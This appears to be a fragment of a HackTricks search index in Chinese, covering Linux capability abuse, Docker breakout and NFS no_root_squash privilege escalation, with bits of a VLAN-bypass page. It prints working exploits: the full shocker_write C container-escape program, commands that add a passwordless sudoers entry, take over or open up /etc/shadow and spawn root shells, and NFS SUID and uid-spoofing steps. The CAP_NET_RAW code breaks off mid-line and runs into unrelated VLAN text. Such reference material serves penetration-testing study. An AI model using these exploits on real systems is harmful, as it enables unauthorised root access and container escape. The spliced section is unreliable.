vlan=outer)/payload\\nsendp(frame, iface=\\"eth0\\")","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 3. QinQ (802.1ad) Stacking","id":"185","title":"3. 
QinQ (802.1ad) Stacking"},"1850":{"body":"这意味着您可以绕过任何文件的写权限检查,因此您可以写入任何文件。 有很多文件您可以 覆盖以提升权限, 您可以从这里获取灵感 。 使用二进制文件的示例 在这个示例中,vim 具有此能力,因此您可以修改任何文件,如 passwd 、 sudoers 或 shadow : bash getcap -r / 2>/dev/null\\n/usr/bin/vim = cap_dac_override+ep vim /etc/sudoers #To overwrite it 示例与二进制 2 在此示例中, python 二进制文件将具有此能力。您可以使用 python 来覆盖任何文件: python file=open(\\"/etc/sudoers\\",\\"a\\")\\nfile.write(\\"yourusername ALL=(ALL) NOPASSWD:ALL\\")\\nfile.close() 示例:环境 + CAP_DAC_READ_SEARCH(Docker突破) 您可以使用以下命令检查Docker容器内启用的能力: bash capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep\\nBounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root) 首先阅读上一节中关于 滥用 DAC_READ_SEARCH 能力以读取任意文件 的内容,并 编译 利用程序。 然后, 编译以下版本的 shocker 利用程序 ,这将允许您在主机文件系统中 写入任意文件 : c #include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include // gcc shocker_write.c -o shocker_write\\n// ./shocker_write /etc/passwd passwd struct my_file_handle {\\nunsigned int handle_bytes;\\nint handle_type;\\nunsigned char f_handle[8];\\n};\\nvoid die(const char * msg) {\\nperror(msg);\\nexit(errno);\\n}\\nvoid dump_handle(const struct my_file_handle * h) {\\nfprintf(stderr, \\"[*] #=%d, %d, char nh[] = {\\", h -> handle_bytes,\\nh -> handle_type);\\nfor (int i = 0; i < h -> handle_bytes; ++i) {\\nfprintf(stderr, \\"0x%02x\\", h -> f_handle[i]);\\nif ((i + 1) % 20 == 0)\\nfprintf(stderr, \\"\\\\n\\");\\nif (i < h -> handle_bytes - 1)\\nfprintf(stderr, \\", \\");\\n}\\nfprintf(stderr, 
\\"};\\\\n\\");\\n}\\nint find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)\\n{\\nint fd;\\nuint32_t ino = 0;\\nstruct my_file_handle outh = {\\n.handle_bytes = 8,\\n.handle_type = 1\\n};\\nDIR * dir = NULL;\\nstruct dirent * de = NULL;\\npath = strchr(path, \'/\');\\n// recursion stops if path has been resolved\\nif (!path) {\\nmemcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle));\\noh -> handle_type = 1;\\noh -> handle_bytes = 8;\\nreturn 1;\\n}\\n++path;\\nfprintf(stderr, \\"[*] Resolving \'%s\'\\\\n\\", path);\\nif ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0)\\ndie(\\"[-] open_by_handle_at\\");\\nif ((dir = fdopendir(fd)) == NULL)\\ndie(\\"[-] fdopendir\\");\\nfor (;;) {\\nde = readdir(dir);\\nif (!de)\\nbreak;\\nfprintf(stderr, \\"[*] Found %s\\\\n\\", de -> d_name);\\nif (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) {\\nfprintf(stderr, \\"[+] Match: %s ino=%d\\\\n\\", de -> d_name, (int) de -> d_ino);\\nino = de -> d_ino;\\nbreak;\\n}\\n}\\nfprintf(stderr, \\"[*] Brute forcing remaining 32bit. 
This can take a while...\\\\n\\");\\nif (de) {\\nfor (uint32_t i = 0; i < 0xffffffff; ++i) {\\nouth.handle_bytes = 8;\\nouth.handle_type = 1;\\nmemcpy(outh.f_handle, & ino, sizeof(ino));\\nmemcpy(outh.f_handle + 4, & i, sizeof(i));\\nif ((i % (1 << 20)) == 0)\\nfprintf(stderr, \\"[*] (%s) Trying: 0x%08x\\\\n\\", de -> d_name, i);\\nif (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) {\\nclosedir(dir);\\nclose(fd);\\ndump_handle( & outh);\\nreturn find_handle(bfd, path, & outh, oh);\\n}\\n}\\n}\\nclosedir(dir);\\nclose(fd);\\nreturn 0;\\n}\\nint main(int argc, char * argv[]) {\\nchar buf[0x1000];\\nint fd1, fd2;\\nstruct my_file_handle h;\\nstruct my_file_handle root_h = {\\n.handle_bytes = 8,\\n.handle_type = 1,\\n.f_handle = {\\n0x02,\\n0,\\n0,\\n0,\\n0,\\n0,\\n0,\\n0\\n}\\n};\\nfprintf(stderr, \\"[***] docker VMM-container breakout Po(C) 2014 [***]\\\\n\\"\\n\\"[***] The tea from the 90\'s kicks your sekurity again. [***]\\\\n\\"\\n\\"[***] If you have pending sec consulting, I\'ll happily [***]\\\\n\\"\\n\\"[***] forward to my friends who drink secury-tea too! [***]\\\\n\\\\n\\\\n\\");\\nread(0, buf, 1);\\n// get a FS reference from something mounted in from outside\\nif ((fd1 = open(\\"/etc/hostname\\", O_RDONLY)) < 0)\\ndie(\\"[-] open\\");\\nif (find_handle(fd1, argv[1], & root_h, & h) <= 0)\\ndie(\\"[-] Cannot find valid handle!\\");\\nfprintf(stderr, \\"[!] 
Got a final handle!\\\\n\\");\\ndump_handle( & h);\\nif ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0)\\ndie(\\"[-] open_by_handle\\");\\nchar * line = NULL;\\nsize_t len = 0;\\nFILE * fptr;\\nssize_t read;\\nfptr = fopen(argv[2], \\"r\\");\\nwhile ((read = getline( & line, & len, fptr)) != -1) {\\nwrite(fd2, line, read);\\n}\\nprintf(\\"Success!!\\\\n\\");\\nclose(fd2);\\nclose(fd1);\\nreturn 0;\\n} 为了逃离 docker 容器,你可以 下载 主机上的文件 /etc/shadow 和 /etc/passwd, 添加 一个 新用户 ,并使用 shocker_write 来覆盖它们。然后,通过 ssh 访问 。 该技术的代码来自于“滥用 DAC_OVERRIDE 能力”实验室 https://www.pentesteracademy.com","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_DAC_OVERRIDE","id":"1850","title":"CAP_DAC_OVERRIDE"},"1851":{"body":"这意味着可以更改任何文件的所有权。 带有二进制文件的示例 假设 python 二进制文件具有此能力,你可以 更改 shadow 文件的 所有者 , 更改 root 密码 ,并提升权限: bash python -c \'import os;os.chown(\\"/etc/shadow\\",1000,1000)\' 或者 ruby 二进制文件具有此能力: bash ruby -e \'require \\"fileutils\\"; FileUtils.chown(1000, 1000, \\"/etc/shadow\\")\'","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_CHOWN","id":"1851","title":"CAP_CHOWN"},"1852":{"body":"这意味着可以更改任何文件的权限。 带二进制的示例 如果python具有此能力,您可以修改shadow文件的权限, 更改root密码 ,并提升权限: bash python -c \'import os;os.chmod(\\"/etc/shadow\\",0666)","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_FOWNER","id":"1852","title":"CAP_FOWNER"},"1853":{"body":"这意味着可以设置创建进程的有效用户 ID。 带二进制的示例 如果 python 拥有这个 capability ,你可以很容易地利用它来提升权限到 root: python import os\\nos.setuid(0)\\nos.system(\\"/bin/bash\\") 另一种方法: python import os\\nimport prctl\\n#add the capability to the effective set\\nprctl.cap_effective.setuid = True\\nos.setuid(0)\\nos.system(\\"/bin/bash\\")","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SETUID","id":"1853","title":"CAP_SETUID"},"1854":{"body":"这意味着可以设置创建进程的有效组 ID。 有很多文件可以 覆盖以提升权限, 你可以从这里获取灵感 。 二进制文件示例 在这种情况下,你应该寻找组可以读取的有趣文件,因为你可以冒充任何组: bash #Find every file writable by a group\\nfind / -perm /g=w -exec ls 
-lLd {} \\\\; 2>/dev/null\\n#Find every file writable by a group in /etc with a maxpath of 1\\nfind /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \\\\; 2>/dev/null\\n#Find every file readable by a group in /etc with a maxpath of 1\\nfind /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \\\\; 2>/dev/null 一旦你找到一个可以滥用的文件(通过读取或写入)以提升权限,你可以通过以下方式 获取一个模拟有趣组的 shell : python import os\\nos.setgid(42)\\nos.system(\\"/bin/bash\\") 在这种情况下,组 shadow 被冒充,因此您可以读取文件 /etc/shadow: bash cat /etc/shadow 如果 docker 已安装,您可以 冒充 docker 组 并利用它与 docker socket 进行通信并提升权限 。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SETGID","id":"1854","title":"CAP_SETGID"},"1855":{"body":"这意味着可以在文件和进程上设置能力 二进制示例 如果 python 拥有此 能力 ,您可以非常轻松地利用它提升权限到 root: setcapability.py import ctypes, sys #Load needed library\\n#You can find which library you need to load checking the libraries of local setcap binary\\n# ldd /sbin/setcap\\nlibcap = ctypes.cdll.LoadLibrary(\\"libcap.so.2\\") libcap.cap_from_text.argtypes = [ctypes.c_char_p]\\nlibcap.cap_from_text.restype = ctypes.c_void_p\\nlibcap.cap_set_file.argtypes = [ctypes.c_char_p,ctypes.c_void_p] #Give setuid cap to the binary\\ncap = \'cap_setuid+ep\'\\npath = sys.argv[1]\\nprint(path)\\ncap_t = libcap.cap_from_text(cap)\\nstatus = libcap.cap_set_file(path,cap_t) if(status == 0):\\nprint (cap + \\" was successfully added to \\" + path) bash python setcapability.py /usr/bin/python2.7 warning 注意,如果您使用 CAP_SETFCAP 为二进制文件设置了新的能力,您将失去此能力。 一旦您拥有 SETUID capability ,您可以查看其部分以了解如何提升权限。 带环境的示例(Docker 突破) 默认情况下,能力 CAP_SETFCAP 被授予 Docker 容器内的进程 。您可以通过执行以下操作来检查: bash cat /proc/`pidof bash`/status | grep Cap\\nCapInh: 00000000a80425fb\\nCapPrm: 00000000a80425fb\\nCapEff: 00000000a80425fb\\nCapBnd: 00000000a80425fb\\nCapAmb: 0000000000000000 capsh 
--decode=00000000a80425fb\\n0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap 这个能力允许 将任何其他能力赋予二进制文件 ,因此我们可以考虑 利用本页提到的其他能力突破 来 逃逸 容器。 然而,如果你尝试例如将能力 CAP_SYS_ADMIN 和 CAP_SYS_PTRACE 赋予 gdb 二进制文件,你会发现你可以赋予它们,但 二进制文件在此之后将无法执行 : bash getcap /usr/bin/gdb\\n/usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb /usr/bin/gdb\\nbash: /usr/bin/gdb: Operation not permitted From the docs : Permitted: 这是一个 有效能力的限制超集 ,线程可以假设它。它也是一个限制超集,线程可以将其添加到可继承集合的能力,前提是该线程在其有效集合中 没有 CAP_SETPCAP 能力。 看起来 Permitted 能力限制了可以使用的能力。 然而,Docker 默认也授予 CAP_SETPCAP ,因此您可能能够 在可继承的能力中设置新能力 。 然而,在该能力的文档中: CAP_SETPCAP : […] 将调用线程的边界 集合中的任何能力添加到其可继承集合。 看起来我们只能将边界集合中的能力添加到可继承集合。这意味着 我们不能将新能力如 CAP_SYS_ADMIN 或 CAP_SYS_PTRACE 放入继承集合以提升权限 。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SETFCAP","id":"1855","title":"CAP_SETFCAP"},"1856":{"body":"CAP_SYS_RAWIO 提供了一些敏感操作,包括访问 /dev/mem、/dev/kmem 或 /proc/kcore,修改 mmap_min_addr,访问 ioperm(2) 和 iopl(2) 系统调用,以及各种磁盘命令。FIBMAP ioctl(2) 也通过此能力启用,这在 过去 造成了一些问题。根据手册页,这也允许持有者描述性地对其他设备执行一系列特定于设备的操作。 这对于 权限提升 和 Docker 突破 非常有用。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_RAWIO","id":"1856","title":"CAP_SYS_RAWIO"},"1857":{"body":"这意味着可以终止任何进程。 带有二进制文件的示例 假设 python 二进制文件具有此能力。如果您还可以 修改某些服务或套接字配置 (或与服务相关的任何配置文件)文件,您可以对其进行后门处理,然后终止与该服务相关的进程,并等待新的配置文件执行您的后门。 python #Use this python code to kill arbitrary processes\\nimport os\\nimport signal\\npgid = os.getpgid(341)\\nos.killpg(pgid, signal.SIGKILL) 使用 kill 提权 如果你拥有 kill 权限,并且有一个 以 root 身份运行的 node 程序 (或以其他用户身份运行),你可以可能 发送 给它 信号 SIGUSR1 ,使其 打开 node 调试器 ,以便你可以连接。 bash kill -s SIGUSR1 \\n# After an URL to access the debugger will appear. e.g. 
ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d Node inspector/CEF debug abuse","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_KILL","id":"1857","title":"CAP_KILL"},"1858":{"body":"这意味着可以在任何端口上监听(甚至是特权端口)。 你不能直接通过这个能力提升特权。 带有二进制的示例 如果 python 拥有这个能力,它将能够在任何端口上监听,甚至可以从该端口连接到任何其他端口(某些服务需要从特定特权端口进行连接) Listen\\nConnect python import socket\\ns=socket.socket()\\ns.bind((\'0.0.0.0\', 80))\\ns.listen(1)\\nconn, addr = s.accept()\\nwhile True:\\noutput = connection.recv(1024).strip();\\nprint(output) python import socket\\ns=socket.socket()\\ns.bind((\'0.0.0.0\',500))\\ns.connect((\'10.10.10.10\',500))","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_NET_BIND_SERVICE","id":"1858","title":"CAP_NET_BIND_SERVICE"},"1859":{"body":"CAP_NET_RAW 能力允许进程 创建 RAW 和 PACKET 套接字 ,使它们能够生成和发送任意网络数据包。这可能导致容器化环境中的安全风险,例如数据包欺骗、流量注入和绕过网络访问控制。恶意行为者可能利用这一点干扰容器路由或危害主机网络安全,尤其是在没有足够防火墙保护的情况下。此外, CAP_NET_RAW 对于特权容器支持通过 RAW ICMP 请求进行的操作(如 ping)至关重要。 这意味着可以嗅探流量。 你不能直接通过这个能力提升权限。 带二进制的示例 如果二进制文件 tcpdump 拥有此能力,你将能够使用它捕获网络信息。 bash getcap -r / 2>/dev/null\\n/usr/sbin/tcpdump = cap_net_raw+ep 注意,如果 环境 提供了这个能力,你也可以使用**tcpdump**来嗅探流量。 使用二进制 2 的示例 以下示例是**python2**代码,可以用于拦截\\" lo \\"( localhost )接口的流量。该代码来自实验\\" 基础知识:CAP-NET_BIND + NET_RAW \\",来自 https://attackdefense.pentesteracademy.com/ python import socket\\nimport struct flags=[\\"NS\\",\\"CWR\\",\\"ECE\\",\\"URG\\",\\"ACK\\",\\"PSH\\",\\"RST\\",\\"SYN\\",\\"FIN\\"] def getFlag(flag_value):\\nflag=\\"\\"\\nfor i in xrange(8,-1,-1):\\nif( flag_value & 1 < with a DHCP or static address inside the voice VLAN 该技术绕过了数据/语音分离,并且在2025年的企业边缘交换机上极为常见,因为许多型号默认启用了LLDP自动策略。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 4. 通过 LLDP/CDP 进行 Voice-VLAN 劫持 (IP-电话欺骗)","id":"186","title":"4. 
通过 LLDP/CDP 进行 Voice-VLAN 劫持 (IP-电话欺骗)"},"1860":{"body":"CAP_NET_ADMIN 能力赋予持有者 更改网络配置 的权力,包括防火墙设置、路由表、套接字权限和暴露的网络命名空间中的网络接口设置。它还允许在网络接口上启用 混杂模式 ,允许跨命名空间进行数据包嗅探。 带二进制的示例 假设 python 二进制文件 具有这些能力。 python #Dump iptables filter table rules\\nimport iptc\\nimport pprint\\njson=iptc.easy.dump_table(\'filter\',ipv6=False)\\npprint.pprint(json) #Flush iptables filter table\\nimport iptc\\niptc.easy.flush_table(\'filter\')","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_NET_ADMIN + CAP_NET_RAW","id":"1860","title":"CAP_NET_ADMIN + CAP_NET_RAW"},"1861":{"body":"这意味着可以修改 inode 属性。 你不能直接通过这个能力提升权限。 带有二进制的示例 如果你发现一个文件是不可变的,并且 python 具有这个能力,你可以 移除不可变属性并使文件可修改: python #Check that the file is imutable\\nlsattr file.sh\\n----i---------e--- backup.sh python #Pyhton code to allow modifications to the file\\nimport fcntl\\nimport os\\nimport struct FS_APPEND_FL = 0x00000020\\nFS_IOC_SETFLAGS = 0x40086602 fd = os.open(\'/path/to/file.sh\', os.O_RDONLY)\\nf = struct.pack(\'i\', FS_APPEND_FL)\\nfcntl.ioctl(fd, FS_IOC_SETFLAGS, f) f=open(\\"/path/to/file.sh\\",\'a+\')\\nf.write(\'New content for the file\\\\n\') tip 注意,通常这个不可变属性是通过以下命令设置和移除的: sudo chattr +i file.txt\\nsudo chattr -i file.txt","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_LINUX_IMMUTABLE","id":"1861","title":"CAP_LINUX_IMMUTABLE"},"1862":{"body":"CAP_SYS_CHROOT 使得可以执行 chroot(2) 系统调用,这可能允许通过已知漏洞逃离 chroot(2) 环境: 如何从各种 chroot 解决方案中突破 chw00t: chroot 逃逸工具","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_CHROOT","id":"1862","title":"CAP_SYS_CHROOT"},"1863":{"body":"CAP_SYS_BOOT 不仅允许执行 reboot(2) 系统调用以重启系统,包括针对特定硬件平台的特定命令,如 LINUX_REBOOT_CMD_RESTART2,还允许使用 kexec_load(2),并且从 Linux 3.17 开始,允许使用 kexec_file_load(2) 来加载新的或签名的崩溃内核。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_BOOT","id":"1863","title":"CAP_SYS_BOOT"},"1864":{"body":"CAP_SYSLOG 在 Linux 2.6.37 中从更广泛的 CAP_SYS_ADMIN 中分离,特别授予使用 syslog(2) 调用的能力。此能力使得在 kptr_restrict 设置为 1 时,可以通过 
/proc 和类似接口查看内核地址,该设置控制内核地址的暴露。自 Linux 2.6.39 起,kptr_restrict 的默认值为 0,这意味着内核地址被暴露,尽管许多发行版出于安全原因将其设置为 1(隐藏地址,除非来自 uid 0)或 2(始终隐藏地址)。 此外, CAP_SYSLOG 允许在 dmesg_restrict 设置为 1 时访问 dmesg 输出。尽管这些变化, CAP_SYS_ADMIN 仍然保留执行 syslog 操作的能力,因其历史原因。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYSLOG","id":"1864","title":"CAP_SYSLOG"},"1865":{"body":"CAP_MKNOD 扩展了 mknod 系统调用的功能,不仅限于创建常规文件、FIFO(命名管道)或 UNIX 域套接字。它特别允许创建特殊文件,包括: S_IFCHR :字符特殊文件,如终端设备。 S_IFBLK :块特殊文件,如磁盘设备。 此能力对于需要创建设备文件的进程至关重要,便于通过字符或块设备直接与硬件交互。 这是一个默认的 docker 能力 ( https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19 )。 此能力允许在主机上进行特权提升(通过完全磁盘读取),在以下条件下: 拥有对主机的初始访问(无特权)。 拥有对容器的初始访问(特权(EUID 0),并有效的 CAP_MKNOD)。 主机和容器应共享相同的用户命名空间。 在容器中创建和访问块设备的步骤: 在主机上作为标准用户: 使用 id 确定当前用户 ID,例如 uid=1000(standarduser)。 确定目标设备,例如 /dev/sdb。 在容器内作为 root: bash # Create a block special file for the host device\\nmknod /dev/sdb b 8 16\\n# Set read and write permissions for the user and group\\nchmod 660 /dev/sdb\\n# Add the corresponding standard user present on the host\\nuseradd -u 1000 standarduser\\n# Switch to the newly created user\\nsu standarduser 回到主机: bash # Locate the PID of the container process owned by \\"standarduser\\"\\n# This is an illustrative example; actual command might vary\\nps aux | grep -i container_name | grep -i standarduser\\n# Assuming the found PID is 12345\\n# Access the container\'s filesystem and the special block device\\nhead /proc/12345/root/dev/sdb 这种方法允许标准用户通过容器访问并可能读取来自 /dev/sdb 的数据,利用共享的用户命名空间和设备上设置的权限。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_MKNOD","id":"1865","title":"CAP_MKNOD"},"1866":{"body":"CAP_SETPCAP 使进程能够 更改另一个进程的能力集 ,允许从有效、可继承和允许的集合中添加或删除能力。然而,进程只能修改其自身允许集中的能力,确保它无法将另一个进程的权限提升到超出自身的范围。最近的内核更新收紧了这些规则,限制 CAP_SETPCAP 只能减少其自身或其后代的允许集中的能力,以降低安全风险。使用此功能需要在有效集中拥有 CAP_SETPCAP,并在允许集中拥有目标能力,利用 capset() 进行修改。这总结了 CAP_SETPCAP 的核心功能和限制,突出了其在权限管理和安全增强中的作用。 CAP_SETPCAP 是一种 Linux 能力,允许进程 修改另一个进程的能力集 
。它授予从其他进程的有效、可继承和允许能力集中添加或删除能力的能力。然而,对如何使用此能力有某些限制。 具有 CAP_SETPCAP 的进程 只能授予或删除其自身允许能力集中存在的能力 。换句话说,如果进程自身没有某个能力,则无法将该能力授予另一个进程。这一限制防止了进程将另一个进程的权限提升到超出自身的权限级别。 此外,在最近的内核版本中,CAP_SETPCAP 能力已被 进一步限制 。它不再允许进程任意修改其他进程的能力集。相反,它 仅允许进程降低其自身允许能力集或其后代的允许能力集中的能力 。这一变化旨在减少与能力相关的潜在安全风险。 要有效使用 CAP_SETPCAP,您需要在有效能力集中拥有该能力,并在允许能力集中拥有目标能力。然后,您可以使用 capset() 系统调用来修改其他进程的能力集。 总之,CAP_SETPCAP 允许进程修改其他进程的能力集,但不能授予自身没有的能力。此外,由于安全问题,其功能在最近的内核版本中已被限制,仅允许减少其自身允许能力集或其后代的允许能力集中的能力。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SETPCAP","id":"1866","title":"CAP_SETPCAP"},"1867":{"body":"这些示例大多来自 https://attackdefense.pentesteracademy.com/ ,因此如果您想练习这些权限提升技术,我推荐这些实验室。 其他参考文献 : https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux https://www.schutzwerk.com/en/43/posts/linux_container_capabilities/#:~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20. https://linux-audit.com/linux-capabilities-101/ https://www.linuxjournal.com/article/5737 https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap_sys_module https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot ​ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 参考文献","id":"1867","title":"参考文献"},"1868":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » NFS No Root Squash Misconfiguration Privilege Escalation","id":"1868","title":"NFS No Root Squash Misconfiguration Privilege Escalation"},"1869":{"body":"NFS 通常(特别是在 Linux 中)会信任连接的客户端所指示的 uid 和 gid 来访问文件(如果没有使用 kerberos)。然而,服务器上可以设置一些配置来 改变这种行为 : all_squash :它会将所有访问映射到**nobody**(65534 无符号 / -2 有符号)。因此,所有人都是 nobody,没有用户被使用。 root_squash/no_all_squash :这是 Linux 的默认设置, 仅对 uid 0(root)进行压缩 。因此,任何 UID 和 GID 都被信任,但 0 被压缩为 nobody(因此无法进行 root 冒充)。 no_root_squash :如果启用此配置,甚至不会压缩 root 用户。这意味着如果你以此配置挂载一个目录,你可以作为 root 访问它。 在 /etc/exports 文件中,如果你发现某个目录被配置为 no_root_squash ,那么你可以 作为客户端访问 它,并 像本地机器的 root 一样在该目录中写入 。 有关 NFS 的更多信息,请查看: 2049 - Pentesting NFS Service","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Squashing Basic Info","id":"1869","title":"Squashing Basic Info"},"187":{"body":"在所有面向用户的端口上禁用DTP:switchport mode access + switchport nonegotiate。 将每个干线的本地VLAN更改为 未使用的黑洞VLAN 并标记:vlan dot1q tag native。 在干线上修剪不必要的VLAN:switchport trunk allowed vlan 10,20。 强制实施端口安全、DHCP嗅探、动态ARP检查 和802.1X 以限制恶意的二层活动。 如果不需要IP电话欺骗,请禁用LLDP-MED自动语音策略(或将其锁定到经过身份验证的MAC OUI)。 优先使用私有VLAN或L3分段,而不是仅依赖802.1Q分离。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 防御建议","id":"187","title":"防御建议"},"1870":{"body":"","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Privilege Escalation","id":"1870","title":"Privilege Escalation"},"1871":{"body":"选项 1 使用 bash: 在客户端机器上挂载该目录 ,并 作为 root 复制 /bin/bash 二进制文件到挂载文件夹中,并赋予其 SUID 权限,然后 从受害者 机器执行该 bash 二进制文件。 请注意,要在 NFS 共享中成为 root, no_root_squash 必须在服务器上配置。 然而,如果未启用,你可以通过将二进制文件复制到 NFS 共享并以你想要提升的用户身份赋予 SUID 权限来提升到其他用户。 bash #Attacker, as root user\\nmkdir /tmp/pe\\nmount -t nfs : /tmp/pe\\ncd /tmp/pe\\ncp /bin/bash .\\nchmod +s bash #Victim\\ncd \\n./bash -p #ROOT shell 选项 2 使用 C 编译代码: 在客户端机器上挂载该目录 ,并 以 
root 身份复制 我们的编译有效载荷到挂载文件夹中,该有效载荷将滥用 SUID 权限,赋予其 SUID 权限,并 从受害者 机器执行该二进制文件(您可以在这里找到一些 C SUID 有效载荷 )。 与之前相同的限制 bash #Attacker, as root user\\ngcc payload.c -o payload\\nmkdir /tmp/pe\\nmount -t nfs : /tmp/pe\\ncd /tmp/pe\\ncp /tmp/payload .\\nchmod +s payload #Victim\\ncd \\n./payload #ROOT shell","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Remote Exploit","id":"1871","title":"Remote Exploit"},"1872":{"body":"tip 注意,如果您可以从您的机器创建一个 到受害者机器的隧道,您仍然可以使用远程版本来利用此特权提升,隧道所需的端口 。 以下技巧适用于文件/etc/exports 指示一个IP 的情况。在这种情况下,您 将无法使用 任何情况下的 远程利用 ,您需要 利用这个技巧 。 另一个使利用能够工作的必要条件是**/etc/export中的导出** 必须使用insecure标志 。 -- 我不确定如果/etc/export指示一个IP地址,这个技巧是否有效 --","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Local Exploit","id":"1872","title":"Local Exploit"},"1873":{"body":"该场景涉及利用本地机器上挂载的NFS共享,利用NFSv3规范中的一个缺陷,该缺陷允许客户端指定其uid/gid,从而可能实现未经授权的访问。利用涉及使用 libnfs ,这是一个允许伪造NFS RPC调用的库。 Compiling the Library 库的编译步骤可能需要根据内核版本进行调整。在这种特定情况下,fallocate系统调用被注释掉。编译过程涉及以下命令: bash ./bootstrap\\n./configure\\nmake\\ngcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/ 进行利用 利用涉及创建一个简单的 C 程序 (pwn.c),该程序提升权限到 root,然后执行一个 shell。程序被编译,生成的二进制文件 (a.out) 被放置在具有 suid root 的共享上,使用 ld_nfs.so 在 RPC 调用中伪造 uid: 编译利用代码: bash cat pwn.c\\nint main(void){setreuid(0,0); system(\\"/bin/bash\\"); return 0;}\\ngcc pwn.c -o a.out 将漏洞放置在共享上并通过伪造 uid 修改其权限: bash LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/\\nLD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out\\nLD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out\\nLD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out 执行漏洞利用以获得根权限: bash /mnt/share/a.out\\n#root","breadcrumbs":"Linux Privilege Escalation » NFS 
